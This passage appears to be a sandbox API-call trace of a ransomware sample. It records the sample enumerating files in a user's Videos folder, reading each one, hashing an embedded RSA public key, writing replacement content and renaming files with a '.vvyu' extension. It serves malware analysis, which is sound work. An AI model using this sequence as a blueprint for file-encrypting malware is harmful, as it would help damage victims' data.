Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.717] GetCurrentThreadId () returned 0x5d8 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae85c8 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.718] GetCurrentThreadId () returned 0x5d8 [0195.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9f00 | out: hHeap=0x2c0000) returned 1 [0195.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.731] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16287, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16287, lpOverlapped=0x0) returned 1 [0195.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.733] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1628c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.733] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.735] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.735] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.735] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.736] CloseHandle (hObject=0x584) returned 1 [0195.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.738] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\7lrwy.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\7lrwy.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\7lrwy.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\7lrwy.flv.vvyu")) returned 1 [0195.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.740] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a2220, ftCreationTime.dwHighDateTime=0x1d89c64, ftLastAccessTime.dwLowDateTime=0xcfb4a680, ftLastAccessTime.dwHighDateTime=0x1d89ebd, ftLastWriteTime.dwLowDateTime=0xcfb4a680, ftLastWriteTime.dwHighDateTime=0x1d89ebd, nFileSizeHigh=0x0, nFileSizeLow=0x6378, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="geIB4J_yYE XOIcR0.flv", cAlternateFileName="GEIB4J~1.FLV")) returned 1 [0195.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.743] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\geIB4J_yYE XOIcR0.flv") returned=".flv" [0195.743] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\geIB4J_yYE XOIcR0.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\geib4j_yye xoicr0.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.747] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=25464) returned 1 [0195.747] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.750] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.750] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.753] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.753] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x6378, lpOverlapped=0x0) returned 1 [0195.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.754] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.756] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.756] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.756] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.756] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.756] GetLastError () returned 0x0 [0195.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.756] GetLastError () returned 0x0 [0195.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.757] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.757] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.757] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.757] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.757] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6380) returned 0x2af5168 [0195.758] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 